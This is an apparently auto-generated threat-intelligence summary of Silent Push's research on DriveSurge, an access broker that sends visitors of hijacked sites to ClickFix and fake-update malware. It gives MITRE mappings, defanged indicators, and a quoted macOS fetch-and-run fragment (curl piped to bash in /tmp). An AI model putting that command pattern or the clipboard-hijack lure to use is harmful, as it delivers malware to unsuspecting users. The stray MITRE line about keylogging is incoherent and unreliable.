Silent Push identified DriveSurge, a specialized Initial Access Broker using zTDS to hijack thousands of legitimate websites and redirect victims to ClickFix and FakeUpdates delivery chains at scale. The investigation also uncovered related infrastructure for ad distribution and macOS payload staging, including domains, IPs, and server fingerprints tied to DriveSurge’s broader campaign. #DriveSurge #zTDS #ClickFix #FakeUpdates #banerpanel.live #jclforwarding.com #cptoptious.com
Keypoints
- DriveSurge was identified as the primary force behind a large surge in ClickFix and FakeUpdates campaigns.
- The actor appears to operate as an Initial Access Broker using a Pay-Per-Install model to monetize infections and sell victim leads downstream.
- DriveSurge compromised thousands of websites and used zTDS to redirect visitors from trusted sites to malicious destinations.
- Silent Push developed eight fingerprints to map DriveSurge infrastructure, including file patterns, WHOIS pivots, and server configuration indicators.
- A compromised site, jclforwarding[.]com, was observed serving fake browser update lures and ClickFix instructions.
- The research also uncovered ADS infrastructure at banerpanel[.]live, plus a payload and development server at testio[.]ecartdev[.]com.
- Additional analysis revealed obfuscated macOS malware delivery, clipboard hijacking, and C2 infrastructure tied to payload servers.
MITRE Techniques
- [T1189 ] Drive-by Compromise – Victims were redirected from legitimate websites through injected code and zTDS to malicious update pages and payloads (‘hijacks thousands of legitimate, high-reputation websites and silently redirects visitors to malware’).
- [T1059.001 ] PowerShell – ClickFix instructed users to paste a “fix” into a terminal or PowerShell window to run malicious code (‘copy and paste a “fix” into their terminal or PowerShell window’).
- [T1059.004 ] Unix Shell – The macOS payload staged execution through shell commands including curl and bash (‘cd /tmp && curl -kfsSL … && bash … && rm -f …’).
- [T1027 ] Obfuscated Files or Information – The actors used Base64, string concatenation, and filename obfuscation to hide malicious logic (‘obfuscation techniques, such as atob() decoding’ and ‘wrapped in a base64 string’).
- [T1105 ] Ingress Tool Transfer – Malicious scripts and payloads were downloaded from remote servers before execution (‘download the ZIP file’ and ‘curl -kfsSL’).
- [T1204.001 ] User Execution: Malicious Link – Victims were tricked into clicking fake update buttons or pasting commands that executed malware (‘Clicking the update button triggered the download’ and ‘paste (⌘ + V)’).
- [T1115 ] Clipboard Data – The script silently replaced clipboard contents with a malicious command (‘silently replaces the user’s clipboard content with the malicious command’).
- [T1056.001 ] Keylogging or Input Capture: Keylogging not directly mentioned? – Not used.
Indicators of Compromise
- [Domains ] malicious update, TDS, and ad infrastructure – ztds[.]info, check[.]first-node[.]rocks, cptoptious[.]com, banerpanel[.]live
- [Domains ] compromised or suspicious websites and loaders – jclforwarding[.]com, testio[.]ecartdev[.]com, beacontrace[.]bond, webgleam[.]info
- [IP addresses ] ClickFix and payload/C2 activity – 91.92.240[.]127, 46.226.166[.]57, and 147.45.42.205:8133
- [IP addresses ] older payload hosting – 147.45.42.200, 147.45.42.205
- [File names ] payloads and injected scripts – Browser Update[.]exe, t.js, jsrepo, content.ps1
- [Hashes ] downloaded ZIP and payload files – ZIP SHA256 90aecb370dfb1a99a1f7de0a9c6842ab1b664521fddea16b0ec9a91f322646fc, payload SHA256 7aa15de93cf85729ddf970e8d7897f69ece3ca29608f73e784a9ba40c9cea18d, and 2 more hashes
- [Emails ] registration pivots used by the actor – thiagorivera197151[@]ycyfugihih[.]cfd, and one additional actor email referenced in WHOIS pivots
Read more: https://www.silentpush.com/blog/drivesurge/?utm_source=rss&utm_medium=rss&utm_campaign=drivesurge